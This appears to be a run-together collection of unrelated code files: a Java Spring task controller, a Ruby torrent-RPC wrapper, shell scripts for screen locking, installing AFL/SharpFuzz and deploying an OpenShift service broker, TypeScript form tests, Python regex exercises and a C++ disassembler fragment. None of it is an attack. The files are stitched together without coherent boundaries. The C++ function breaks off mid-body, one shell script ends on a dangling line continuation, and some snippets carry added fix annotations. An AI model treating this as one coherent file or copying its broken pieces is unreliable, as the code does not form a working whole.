package com.biachacon.tasks.resources;
import com.biachacon.tasks.domains.Task;
import com.biachacon.tasks.services.TaskService;
import java.util.List;
import java.net.URI;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.CrossOrigin;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.servlet.support.ServletUriComponentsBuilder;
/**
 * REST endpoints for managing {@code Task} resources under the {@code /task}
 * path. Every handler delegates persistence to {@link TaskService}.
 */
@CrossOrigin(origins = "*")
@RequestMapping(value = "/task")
@RestController
public class TaskResource {

    @Autowired
    private TaskService service;

    /** Creates a task; responds 201 with a Location header for the new resource. */
    @PostMapping
    public ResponseEntity<Void> insert(@RequestBody Task obj) {
        Task created = service.insert(obj);
        URI location = ServletUriComponentsBuilder.fromCurrentRequest()
                .path("/{id}")
                .buildAndExpand(created.getId())
                .toUri();
        return ResponseEntity.created(location).build();
    }

    /** Returns every task. */
    @GetMapping
    public ResponseEntity<List<Task>> findAll() {
        return ResponseEntity.ok(service.findAll());
    }

    /** Returns the tasks whose completion status matches {@code status}. */
    @GetMapping(value = "/{status}")
    public ResponseEntity<List<Task>> findAllByStatus(@PathVariable Boolean status) {
        return ResponseEntity.ok(service.findAllByStatus(status));
    }

    /** Deletes a single task by id; responds 204. */
    @DeleteMapping(value = "/{id}")
    public ResponseEntity<Void> delete(@PathVariable Integer id) {
        service.deleteById(id);
        return ResponseEntity.noContent().build();
    }

    /** Toggles/updates the status of a task by id; responds 204. */
    @PutMapping(value = "/{id}")
    public ResponseEntity<Void> update(@PathVariable Integer id) {
        service.updateStatus(id);
        return ResponseEntity.noContent().build();
    }

    /** Deletes every completed task; responds 204. */
    @DeleteMapping
    public ResponseEntity<Void> deleteAllStatusCompleted() {
        service.deleteAllStatusCompleted();
        return ResponseEntity.noContent().build();
    }
}
|
// Auto-generated (Doxygen) navigation data for the arm_cfft_instance_q15
// struct page; each entry is [member name, documentation anchor, subpage].
var structarm__cfft__instance__q15 =
[
    [ "bitRevLength", "structarm__cfft__instance__q15.html#a738907cf34bdbbaf724414ac2decbc3c", null ],
    [ "fftLen", "structarm__cfft__instance__q15.html#a5f9e1d3a8c127ee323b5e6929aeb90df", null ],
    [ "pBitRevTable", "structarm__cfft__instance__q15.html#ac9160b80243b99a0b6e2f75ddb5cf0ae", null ],
    [ "pTwiddle", "structarm__cfft__instance__q15.html#afdaf12ce4687cec021c5ae73d0987a3f", null ]
];
// Repository: mrako/simple-weather-frontend
// Jest transformer: compile test sources with the React preset plus an env
// preset targeting the currently running Node version.
module.exports = require('babel-jest').createTransformer({
  presets: [
    '@babel/preset-react',
    ['@babel/env', { targets: { node: 'current' } }],
  ],
});
|
# Run prediction on the ViATIS test utterances with the PhoBERT+CRF+attention
# checkpoint (lr 4e-5, dropout 0.15 — see the model_dir path components).
python3 predict.py --input_file data/viatis/test/seq.in \
                   --output_file predictions.txt \
                   --model_dir viatis_phobert_crf_attn/4e-5/0.15
|
require 'httparty'
require_relative 'amplitude/errors/amplitude_error'
require_relative 'amplitude/errors/action_error'
require_relative 'amplitude/errors/authentication_error'
require_relative 'amplitude/client'
# Module-level wrapper around a Transmission-style torrent RPC API exposed by
# Amplitude::Client. Configure once with Amplitude.configure, then call the
# convenience methods (find/add/remove/...) which delegate to the client.
module Amplitude
  # Torrent fields always requested by .find / .all.
  DEFAULT_FIELDS = %w(id name totalSize)
  # Queue actions accepted by .prioritize.
  PRIORITIZATION_ACTIONS = %w(up down top bottom)

  # The configured RPC client (set by .configure).
  def self.client
    @client
  end

  # Configure the module-level client. Yields an OpenStruct with
  # username / password / url / debug accessors.
  def self.configure(&blk)
    options = OpenStruct.new
    yield(options)
    @client = Amplitude::Client.new(
      username: options.username,
      # Fixed: the password must come from the yielded options (the previous
      # code contained a corrupted placeholder here).
      password: options.password,
      url: options.url,
      debug: options.debug || false
    )
  end

  # Normalise +ids+ (scalar, array or nested array) and merge into +opts+.
  # Empty id lists are omitted, meaning "all torrents" for most actions.
  def self.build_args(ids, opts = {})
    ids = [ids].flatten.uniq
    args = {}
    args[:ids] = ids if ids.length > 0
    opts.merge(args)
  end

  # Run an RPC action that targets a set of torrent ids.
  def self.ids_action(name, ids, opts = {})
    client.action(name, build_args(ids, opts))
  end

  # Fetch all torrents, with DEFAULT_FIELDS plus any extra +fields+.
  def self.all(fields = [])
    find([], fields)
  end

  # Fetch the torrents with the given +ids+ (all torrents when empty).
  def self.find(ids = [], fields = [])
    ids = [ids].flatten.uniq
    args = {}
    args[:ids] = ids if ids.length > 0
    args[:fields] = (DEFAULT_FIELDS + fields).uniq
    data = client.action('torrent-get', args)
    data['torrents']
  end

  # Update mutable torrent properties.
  def self.set(args)
    # Fixed: flatten!/uniq! return nil when they make no change, so the
    # original chained bang call (`flatten!.uniq!`) could raise
    # NoMethodError; use the non-bang forms and reassign instead.
    args['ids'] = args['ids'].flatten.uniq if args['ids']
    client.action('torrent-set', args)
  end

  def self.start(ids)
    ids_action('torrent-start', ids)
  end

  def self.start_now(ids)
    ids_action('torrent-start-now', ids)
  end

  def self.stop(ids)
    ids_action('torrent-stop', ids)
  end

  def self.verify(ids)
    ids_action('torrent-verify', ids)
  end

  def self.reannounce(ids)
    ids_action('torrent-reannounce', ids)
  end

  # Add a torrent by +filename+ (path/URL) or raw +metainfo+.
  # Raises ActionError when the torrent already exists.
  def self.add(filename, metainfo = nil, opts = {})
    args = {}
    args[:filename] = filename if filename
    # Fixed: previously assigned +filename+ to :metainfo by mistake.
    args[:metainfo] = metainfo if metainfo
    opts.merge!(args)
    data = client.action('torrent-add', opts)
    if data['torrent-duplicate']
      # Fixed: the error class must be instantiated with .new before raising.
      fail ActionError.new("Torrent #{filename} already exists", 500)
    end
    data['torrent-added']
  end

  # Remove torrents; +hard_delete+ also deletes the downloaded data.
  def self.remove(ids, hard_delete = false)
    ids_action(
      'torrent-remove',
      ids,
      'delete-local-data' => hard_delete
    )
  end

  # Change a torrent's storage location; +move+ relocates existing data.
  def self.move(ids, location, move = false)
    ids_action(
      'torrent-set-location',
      ids,
      location: location,
      move: move
    )
  end

  # Rename a file or directory inside a torrent.
  def self.rename(ids, path, name)
    ids_action(
      'torrent-rename-path',
      ids,
      path: path,
      name: name
    )
  end

  def self.session_get
    client.action('session-get')
  end

  def self.session_set(args)
    client.action('session-set', args)
  end

  def self.session_stats
    client.action('session-stats')
  end

  # Refresh the peer blocklist; returns its new size.
  def self.update_blocklist
    data = client.action('blocklist-update')
    data['blocklist-size']
  end

  # Returns true when the listening port is reachable from outside.
  def self.test_port
    data = client.action('port-test')
    data['port-is-open']
  end

  def self.close_session
    client.action('session-close')
  end

  # Move torrents within the download queue; +action+ must be one of
  # PRIORITIZATION_ACTIONS.
  def self.prioritize(ids, action)
    unless PRIORITIZATION_ACTIONS.include?(action)
      # Fixed: instantiate the error class with .new before raising.
      fail ActionError.new('Priorization actions are top, bottom, up and down', 400)
    end
    ids_action("queue-move-#{action}", ids)
  end

  # Free space (in bytes) available at +path+ on the daemon's host.
  def self.free_space(path)
    data = client.action('free-space', path: path)
    data['size-bytes']
  end
end
|
#!/bin/bash
# Lock the screen behind a pixelated screenshot with a centered icon overlay.
ICON=$HOME/.config/i3/images/icon.png
TMPBG=/tmp/screen.png

# Capture the screen (fixed: use $TMPBG instead of repeating the literal path).
scrot "$TMPBG"

# Cheap pixelation: shrink to 10% and scale back up.
convert "$TMPBG" -scale 10% -scale 1000% "$TMPBG"

# Composite the icon in the center of the blurred screenshot.
convert "$TMPBG" "$ICON" -gravity center -composite -matte "$TMPBG"

i3lock -u -i "$TMPBG"
rm "$TMPBG"
|
// Repository: a-type/react-layout
// Package entry point: re-export the public layout primitives.
export { default as Content } from './Content';
export { Provider, Consumer } from './Context';
export { default as Grid } from './Grid';
|
#!/bin/bash
set -e

# Version of american fuzzy lop (afl) to download, patch, and install.
aflVersion=2.52b

# Download and extract the afl-fuzz source package
wget https://lcamtuf.coredump.cx/afl/releases/afl-"$aflVersion".tgz
tar -xvf afl-"$aflVersion".tgz
rm afl-"$aflVersion".tgz
cd afl-"$aflVersion"/

# Patch afl-fuzz so that it doesn't check whether the binary
# being fuzzed is instrumented (we have to do this because
# we are going to run our programs with the dotnet run command,
# and the dotnet binary would fail this check)
wget https://github.com/Metalnem/sharpfuzz/raw/master/patches/RemoveInstrumentationCheck.diff
patch < RemoveInstrumentationCheck.diff

# Install afl-fuzz
sudo make install
cd ..
# Clean up the build tree once the binaries are installed.
rm -rf afl-"$aflVersion"/

# Install SharpFuzz.CommandLine global .NET tool
dotnet tool install --global SharpFuzz.CommandLine
|
# word-level-language-id/train.py
# -*- coding: utf-8 -*-
"""Train and persist character n-gram language models for word-level
language identification (Irish vs. English)."""
from LanguageModel import LanguageModel

# Character n-gram order used by both models.
ngram = 2

# ISO 639-1 language codes. Fixed: these variables were previously named
# fr_* even though the first language is Irish ('ga'), which was misleading.
ga = 'ga'
en = 'en'

# Language model output files.
ga_lm_fn = 'word-level-language-id/models/ga.lm'
en_lm_fn = 'word-level-language-id/models/en.lm'

# Unigram frequency lexicons.
ga_lex = 'word-level-language-id/corpora/ga-words.txt'
en_lex = 'word-level-language-id/corpora/en-GB-words.txt'

# Load lexicons.
ga_lm = LanguageModel(ga, ngram, ga_lex)
en_lm = LanguageModel(en, ngram, en_lex)

# Train and save character n-gram models.
ga_lm.train()
ga_lm.dump(ga_lm_fn)
en_lm.train()
en_lm.dump(en_lm_fn)
|
def calculate_expected_shape(input_dims, group_size, batch_size=8, num_points=256):
    """Build the expected output shapes for a point-cloud grouping op.

    Generalized: the batch size (8) and number of query points (256) were
    hard-coded; they are now defaulted parameters, so existing callers get
    identical results.

    Args:
        input_dims: Number of feature channels per grouped point.
        group_size: Number of neighbours gathered per query point.
        batch_size: Batch dimension (default 8).
        num_points: Number of query points per example (default 256).

    Returns:
        Dict with 'grouped_points_shape' (features/points/padding shapes) and
        'query_points_shape' (points/padding shapes).
    """
    grouped_points_shape = {
        'features': (batch_size, num_points, group_size, input_dims),
        'points': (batch_size, num_points, group_size, 3),
        'padding': (batch_size, num_points, group_size),
    }
    query_points_shape = {
        'points': (batch_size, num_points, 3),
        'padding': (batch_size, num_points),
    }
    return {
        'grouped_points_shape': grouped_points_shape,
        'query_points_shape': query_points_shape,
    }
#!/bin/bash
#
# Minimal example for deploying latest built 'Ansible Service Broker'
# on oc cluster up
#
#
# We deploy oc cluster up with an explicit hostname and routing suffix
# so that pods can access routes internally.
#
# For example, we need to register the ansible service broker route to
# the service catalog when we create the broker resource. The service
# catalog needs to be able to communicate to the ansible service broker.
#
# When we use the default "127.0.0.1.nip.io" route suffix, requests
# from inside the cluster fail with an error like:
#
# From Service Catalog: controller manager
# controller.go:196] Error syncing Broker ansible-service-broker:
# Get https://asb-1338-ansible-service-broker.127.0.0.1.nip.io/v2/catalog:
# dial tcp 127.0.0.1:443: getsockopt: connection refused
#
# To resolve this, we explicitly set the
# --public-hostname and --routing-suffix
#
# We use the IP of the docker interface on our host for testing in a
# local environment, or the external listening IP if we want to expose
# the cluster to the outside.
#
# Below will default to grabbing the IP of docker0, typically this is
# 172.17.0.1 if not customized
#
# Resolve the docker0 interface IP; used as the public hostname base so that
# in-cluster requests to routes resolve correctly (see the comment above).
DOCKER_IP="$(ip addr show docker0 | grep -Po 'inet \K[\d.]+')"
PUBLIC_IP=${PUBLIC_IP:-$DOCKER_IP}
HOSTNAME=${PUBLIC_IP}.nip.io
ROUTING_SUFFIX="${HOSTNAME}"
# Origin image/tag are overridable from the environment.
ORIGIN_IMAGE=${ORIGIN_IMAGE:-"docker.io/openshift/origin"}
ORIGIN_VERSION=${ORIGIN_VERSION:-"latest"}
oc cluster up --image=${ORIGIN_IMAGE} \
    --version=${ORIGIN_VERSION} \
    --service-catalog=true \
    --routing-suffix=${ROUTING_SUFFIX} \
    --public-hostname=${HOSTNAME}
#
# Logging in as system:admin so we can create a clusterrolebinding and
# creating ansible-service-broker project
#
oc login -u system:admin
oc new-project ansible-service-broker
#
# A valid dockerhub username/password is required so the broker may
# authenticate with dockerhub to:
#
# 1) inspect the available repositories in an organization
# 2) read the manifest of each repository to determine metadata about
# the images
#
# This is how the Ansible Service Broker determines what content to
# expose to the Service Catalog
#
# Note: dockerhub API requirements require an authenticated user only,
# the user does not need any special access beyond read access to the
# organization.
#
# By default, the Ansible Service Broker will look at the
# 'ansibleplaybookbundle' organization, this can be overridden with the
# parameter DOCKERHUB_ORG being passed into the template.
#
TEMPLATE_URL=${TEMPLATE_URL:-"https://raw.githubusercontent.com/openshift/ansible-service-broker/master/templates/deploy-ansible-service-broker.template.yaml"}
DOCKERHUB_ORG=${DOCKERHUB_ORG:-"ansibleplaybookbundle"} # DockerHub org where APBs can be found, default 'ansibleplaybookbundle'
ENABLE_BASIC_AUTH="false"

# Extract the service-catalog CA certificate so the broker can be registered
# with the catalog over TLS.
VARS="-p BROKER_CA_CERT=$(oc get secret -n kube-service-catalog -o go-template='{{ range .items }}{{ if eq .type "kubernetes.io/service-account-token" }}{{ index .data "service-ca.crt" }}{{end}}{{"\n"}}{{end}}' | tail -n 1)"

# Creating openssl certs to use for the broker <-> etcd connection.
mkdir -p /tmp/etcd-cert
openssl req -nodes -x509 -newkey rsa:4096 -keyout /tmp/etcd-cert/key.pem -out /tmp/etcd-cert/cert.pem -days 365 -subj "/CN=asb-etcd.ansible-service-broker.svc"
openssl genrsa -out /tmp/etcd-cert/MyClient1.key 2048 \
    && openssl req -new -key /tmp/etcd-cert/MyClient1.key -out /tmp/etcd-cert/MyClient1.csr -subj "/CN=client" \
    && openssl x509 -req -in /tmp/etcd-cert/MyClient1.csr -CA /tmp/etcd-cert/cert.pem -CAkey /tmp/etcd-cert/key.pem -CAcreateserial -out /tmp/etcd-cert/MyClient1.pem -days 1024
ETCD_CA_CERT=$(cat /tmp/etcd-cert/cert.pem | base64)
BROKER_CLIENT_CERT=$(cat /tmp/etcd-cert/MyClient1.pem | base64)
BROKER_CLIENT_KEY=$(cat /tmp/etcd-cert/MyClient1.key | base64)

# Render the template with our parameters and create all objects.
curl -s $TEMPLATE_URL \
    | oc process \
    -n ansible-service-broker \
    -p DOCKERHUB_ORG="$DOCKERHUB_ORG" \
    -p ENABLE_BASIC_AUTH="$ENABLE_BASIC_AUTH" \
    -p ETCD_TRUSTED_CA_FILE=/var/run/etcd-auth-secret/ca.crt \
    -p BROKER_CLIENT_CERT_PATH=/var/run/asb-etcd-auth/client.crt \
    -p BROKER_CLIENT_KEY_PATH=/var/run/asb-etcd-auth/client.key \
    -p ETCD_TRUSTED_CA="$ETCD_CA_CERT" \
    -p BROKER_CLIENT_CERT="$BROKER_CLIENT_CERT" \
    -p BROKER_CLIENT_KEY="$BROKER_CLIENT_KEY" \
    -p NAMESPACE=ansible-service-broker \
    $VARS -f - | oc create -f -
if [ "$?" -ne 0 ]; then
    echo "Error processing template and creating deployment"
    # Fixed: a bare `exit` here returned the status of the preceding `echo`
    # (0), so callers could not detect the failure.
    exit 1
fi
#
# Then login as 'developer'/'developer' to WebUI
# Create a project
# Deploy mediawiki to new project (use a password other than
# admin since mediawiki forbids admin as password)
# Deploy PostgreSQL(ABP) to new project
# After they are up
# Click 'Create Binding' on the kebab menu for Mediawiki,
# select postgres
# Click deploy on mediawiki, after it's redeployed access webui
#
|
import {shouldLockSubmitBtnByControl} from '@control-handlers/submit-btn-lock-handler'
import {getInitFormDataSingleControl} from "@mock-functions/get-initialized-full-form";
import {ControlProps, CurrentControlData} from "@common-types";
describe('set-lock-submit-validator-result find, should lock submit btn', () => {
// A control that passes its rules must not lock the submit button.
test('shouldLockSubmitBtn === false, if control valid', () => {
    const currentControl:ControlProps = {
            type: 'text',
            value: 'abc'
        },
        {controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
        currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
        shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
    expect(shouldLockSubmitBtn).toBeFalsy()
})
// A failing rule alone is not enough: the rule's validator settings must
// opt in via shouldLockSubmitBtnWhenControlInvalid.
test('shouldLockSubmitBtn === false, if control has error on rules, but in rule settings shouldLockSubmitBtnWhenControlInvalid !== true', () => {
    const currentControl:ControlProps = {
            type: 'text',
            value: 'abc',
            validateRules: {
                maxLength: {
                    limit: 2,
                    message: 'longer than limit'
                }
            }
        },
        {controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
        currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
        shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
    expect(shouldLockSubmitBtn).toBeFalsy()
})
// Failing rule + opted-in validator setting → the submit button is locked.
test('shouldLockSubmitBtn === true, if control has error on rules, and in rule settings shouldLockSubmitBtnWhenControlInvalid === true', () => {
    const validatorName = 'maxLength',
        currentControl:ControlProps = {
            type: 'text',
            value: 'abc',
            validateRules: {
                [validatorName]: {
                    limit: 2,
                    message: 'longer than limit'
                },
            },
            validatorsSetting: {
                [validatorName]: {
                    shouldLockSubmitBtnWhenControlInvalid: true
                }
            }
        },
        {controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
        currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
        shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
    expect(shouldLockSubmitBtn).toBeTruthy()
})
// The additionalLockSubmitBtnValidator can lock the button even when all
// the declared rules pass.
test('shouldLockSubmitBtn === true, if control rules valid, but additional submit btn validator return true', () => {
    const validatorName = 'maxLength',
        currentControl:ControlProps = {
            type: 'text',
            value: 'ab',
            validateRules: {
                [validatorName]: {
                    limit: 2,
                    message: 'longer than limit'
                },
            },
            validatorsSetting: {
                [validatorName]: {
                    shouldLockSubmitBtnWhenControlInvalid: true
                }
            },
            additionalLockSubmitBtnValidator: (hooksData) => {
                return {hasError: true}
            }
        },
        {controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
        currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
        shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
    expect(shouldLockSubmitBtn).toBeTruthy()
})
test('shouldLockSubmitBtn === true, if control rules lock submit btn, but additional submit btn validator return false', () => {
const validatorName = 'maxLength',
currentControl:ControlProps = {
type: 'text',
value: 'abc',
validateRules: {
[validatorName]: {
limit: 2,
message: 'longer than limit'
},
},
validatorsSetting: {
[validatorName]: {
shouldLockSubmitBtnWhenControlInvalid: true
}
},
additionalLockSubmitBtnValidator: (hooksData) => {
return {hasError: false}
}
},
{controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
expect(shouldLockSubmitBtn).toBeTruthy()
})
}) |
#!/usr/bin/env bash
python -m batch_runner.plot_batch \
--root_dir ~/tlio_data/CoyoteDataset \
--data_list ~/tlio_data/CoyoteDataset/test.txt \
--runname_globbing "*" \
--filter_dir ../../../tlio_data/CoyoteDataset \
--ronin_dir ../../../tlio_data/CoyoteDataset \ |
import nibabel as nib
import numpy as np
def process_and_save_nifti_image(img, new_file_name):
    """Strip singleton dimensions from a NIfTI image and save it to disk.

    Args:
        img: a loaded nibabel NIfTI image (exposes ``.dataobj`` and ``.affine``).
        new_file_name: target file name/path for the rewritten image.
    """
    # Extract the image data; np.squeeze drops size-1 axes
    # (e.g. a trailing singleton volume dimension).
    img_data = np.squeeze(img.dataobj)
    affine_matrix = img.affine
    # Create a new NIfTI image reusing the original affine transformation
    # matrix so spatial orientation is preserved.
    new_nifti_img = nib.Nifti1Image(img_data, affine_matrix)
    # Save the new NIfTI image with the specified new_file_name
    # (relative paths resolve against the current working directory).
    nib.save(new_nifti_img, new_file_name)
class ProjectCreationRequest {
constructor(projectName, requester, creationDate) {
this.projectName = projectName;
this.requester = requester;
this.creationDate = creationDate;
this.status = "pending";
}
approveRequest() {
this.status = "approved";
}
rejectRequest() {
this.status = "rejected";
}
getStatus() {
return this.status;
}
}
export default ProjectCreationRequest; |
import { renderFile } from 'ejs';
import { promises as fs } from 'fs';
import { resolve } from 'path';
import { Schema, SchemaValue, SchemaValueProperties } from './builder';
import logger from './logger';
export enum FORMAT_TYPE {
FLOW = 'flow',
TS = 'ts'
}
interface AccumulatedExtras {
exportTypes: Array<{ name: string; type: string }>;
importTypes: Array<string>;
}
// Walks a schema's properties and gathers the extra type information the
// templates need: PascalCased exported type names plus a de-duplicated
// list of types to import.
const getAccumulatedExtras = (
    properties: SchemaValueProperties
): AccumulatedExtras => {
    const exportTypes: Array<{ name: string; type: string }> = [];
    const importTypes: Array<string> = [];
    for (const [name, value] of Object.entries(properties)) {
        const { exportTypes: exportType, importTypes: importType } = value;
        if (exportType) {
            // Exported type names are capitalized versions of the property name.
            exportTypes.push({
                name: name[0].toUpperCase() + name.slice(1),
                type: exportType
            });
        }
        if (importType && !importTypes.includes(importType)) {
            importTypes.push(importType);
        }
    }
    return { exportTypes, importTypes };
};
/**
 * Renders one type-definition file per schema entry and writes it to `output`.
 *
 * @param format - target flavour: TypeScript (`.d.ts`) or Flow (`.js.flow`).
 * @param output - directory the generated files are written into.
 * @param schema - parsed schema; non-object entries are skipped.
 * @returns a promise that rejects if rendering or writing any file fails.
 */
export async function generateFile(
    format: FORMAT_TYPE,
    output: string,
    schema: Schema
): Promise<void> {
    const requests = schema.map((descriptor: SchemaValue): Promise<void> | void => {
        if (!(descriptor instanceof Object)) return;
        const { name, properties } = descriptor;
        const templateFile = format === FORMAT_TYPE.TS ? 'typescript' : 'flow';
        return new Promise((promiseResolve, promiseReject): void => {
            renderFile(
                resolve(__dirname, `templates/${templateFile}.ejs`),
                { name, properties, ...getAccumulatedExtras(properties) },
                async (err, result): Promise<void> => {
                    if (err) {
                        logger(err);
                        // BUG FIX: previously we fell through and wrote
                        // `undefined` to disk after a render failure; a
                        // template error must fail the whole generation.
                        promiseReject(err);
                        return;
                    }
                    try {
                        await fs.writeFile(
                            `${output}/${name}.${format === FORMAT_TYPE.TS ? 'd.ts' : 'js.flow'}`,
                            result
                        );
                    } catch (error) {
                        promiseReject(error);
                        return;
                    }
                    promiseResolve();
                }
            );
        });
    });
    await Promise.all(requests);
}
|
// Load environment overrides from the local .env file (habitat) before
// anything reads process.env, and initialise New Relic instrumentation
// first so it can hook the modules required after it.
require('habitat').load();
require('newrelic');
var Hoek = require('hoek');

// Server configuration, assembled entirely from environment variables.
var options = {
    host: process.env.HOST,
    port: process.env.PORT,
    loginAPI: process.env.LOGINAPI,
    // JSON-encoded registries of OAuth clients / auth codes / access tokens;
    // each defaults to empty when the variable is unset.
    oauth_clients: process.env.OAUTH_DB ? JSON.parse(process.env.OAUTH_DB) : [],
    authCodes: process.env.AUTH_CODES ? JSON.parse(process.env.AUTH_CODES) : {},
    accessTokens: process.env.ACCESS_TOKENS ? JSON.parse(process.env.ACCESS_TOKENS) : [],
    cookieSecret: process.env.COOKIE_SECRET,
    secureCookies: process.env.SECURE_COOKIES === 'true',
    uri: process.env.URI,
    // CSRF protection is ON unless explicitly disabled with 'false'.
    enableCSRF: process.env.ENABLE_CSRF !== 'false',
    logging: process.env.LOGGING === 'true',
    logLevel: process.env.LOG_LEVEL ? process.env.LOG_LEVEL : 'info',
    redisUrl: process.env.REDIS_URL
};

var server = require('./server')(options);

server.start(function(error) {
    // Abort the process on any startup error.
    Hoek.assert(!error, error);
    console.log('Server running at: %s', server.info.uri);
});
|
def factorial(num):
    """Return num! (the product 1 * 2 * ... * num).

    Args:
        num: a non-negative integer; factorial(0) == 1 by convention.

    Raises:
        ValueError: if num is negative (previously the loop silently
            returned 1 for any negative input, which is wrong).
    """
    if num < 0:
        raise ValueError("factorial() not defined for negative values: %d" % num)
    product = 1
    for i in range(1, num + 1):
        product *= i
    return product
<filename>PC4problemasdiversos-problema2.py<gh_stars>0
#1 Write the multiplication table of n to 'tabla-n.txt', one product per line.
n = int(input('Introduce un numero entero entre el 1 y el 10: '))
file_name = 'tabla-' + str(n) + '.txt'
f = open(file_name, 'w')
for i in range(1, 11):
    f.write(str(n) + 'x' + str(i) + ' = ' + str(n * i) + '\n')
f.close()
#2 Read back a table file, reporting a friendly error if it does not exist.
n = int(input('Introduce un numero entero entero entre el 1 y el 10: '))
file_name = 'tabla-' + str(n) + '.txt'
try:
    f = open(file_name, 'r')
except FileNotFoundError:
    print('No existe el fichero con la tabla del', n)
else:
    print(f.read())
    f.close()
#3 Print the m-th line of the table of n.
n = int(input('Introduce un numero entero entre el 1 y el 10: '))
m = int(input('Introduce otro numero entero entre 1 y 10: '))
file_name = 'tabla-' + str(n) + '.txt'
try:
    f = open(file_name, 'r')
# BUG FIX: opening a missing file for reading raises FileNotFoundError,
# not FileExistsError -- the old handler could never catch anything.
except FileNotFoundError:
    print('No existe el fichero con la tabla del ', n)
else:
    lines = f.readlines()
    print(lines[m - 1])
    f.close()  # BUG FIX: the file handle was previously leaked
#4 Match a pattern that starts with the literal text '@robot'.
import re
patron = input("escriba su patron: ")
print(re.match(r'@robot', patron))
#5 Extract every digit from the tweet's metadata lines.
tweet = "Unfortunately one of those moments wasn't a giant squid monster. \n User_mentions:2 \n likes: 9 \n number of retweets: 7"
print(re.findall(r'\d', tweet))
#6 Print the lines of a text file that contain at least one vowel.
archivo = input("introduzca su nombre de archivo ")
file_name = str(archivo) + '.txt'
# BUG FIX: the file must be opened for READING (mode 'w' truncated it) and we
# must iterate over the file object, not over the file-name string. The regex
# also used JS-style '/.../' delimiters, which Python treats as literal
# slashes and would therefore never match a plain vowel.
with open(file_name, 'r') as f:
    for linea in f:
        linea = linea.rstrip()
        if re.search(r'[aeiou]', linea):
            print(linea)
#7
def es_correo_valido(correo):
    """Return True when ``correo`` matches the RFC 5322-style address pattern."""
    # The (deliberately exhaustive) RFC 5322 e-mail address regular expression.
    patron_rfc5322 = r"(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"
    return bool(re.match(patron_rfc5322, correo))
# Validate each sample address using the es_correo_valido helper above.
emails = ['<EMAIL>', '<EMAIL>', '!#mary-=@<EMAIL>']
for example in emails:
    # BUG FIX: the original called re.match(emails, example), passing the
    # *list* as the pattern, which raises TypeError at runtime; the helper
    # defined for exercise #7 is what should be applied here.
    if es_correo_valido(example):
        print("The email {email_example} is a valid email".format(email_example=example))
    else:
        print("The email {email_example} is invalid".format(email_example=example))
#8 Rough credit-card-number validation (16 digits or 4x4 separated groups).
regex = r"[0-9]{16}|(([0-9]{4}\s){3}[0-9]{4})|(-([0-9]{4}\s){3}[0-9]{4})(.)\1{4}"
tarjetas = ['4123456789123456', '5123-4567-8912-3456', '61234-567-8912-3456', '4123356789123456', '5133-3367-8912-3456', '5123 - 3567 - 8912 - 3456']
for example in tarjetas:
    if re.match(regex, example):
        # NOTE(review): .format() here has no placeholder to fill, so the card
        # number is never shown -- presumably intended; confirm and simplify.
        print("valid".format(tarjeta_example=example))
    else:
        print("invalid".format(tarjeta_example=example))
|
<reponame>stevengreens10/x86Disassembler
#include <iostream>
#include "InstructionStream.h"
#include "Disassembler.h"
// Decodes the next instruction at the current stream offset and advances the
// offset by the number of bytes consumed.
Instruction InstructionStream::next() {
    auto stream = m_stream + m_numBytesConsumed;
    uint8_t opcode = stream[0];
    // NOTE(review): stream[1] is read before we know whether the opcode has a
    // ModR/M byte at all -- this reads one past the end when a 1-byte
    // instruction is last in the buffer. Confirm the buffer is over-allocated
    // or add a bounds check.
    uint8_t modrm = stream[1];
    int numBytesConsumed = 1;
    Instruction ins{};
    ins.opcode = opcode;
    // Split the ModR/M byte into its mod / reg / rm fields.
    ins.mod = mod(modrm);
    ins.reg = reg(modrm);
    ins.rm = rm(modrm);
    ins.mode = Disassembler::modeTable[ins.mod];
    if (opcode == 0x31) {
        // 0x31 /r : XOR r/m32, r32 -- decoded here as a register-to-register op.
        ins.mnemonic = InstructionMnemonic::XOR;
        ins.instructionType = InstructionType::REG_REG;
        ins.regSrc = Disassembler::reg32Table.find(ins.reg)->second;
        ins.regDst = Disassembler::reg32Table.find(ins.rm)->second;
        numBytesConsumed = 2; // opcode byte + ModR/M byte
    } else {
        // Unknown opcode: report it and abort the whole disassembly.
        std::cerr << "Could not parse instruction with opcode 0x" << std::hex << (int) opcode << std::endl;
        exit(1);
    }
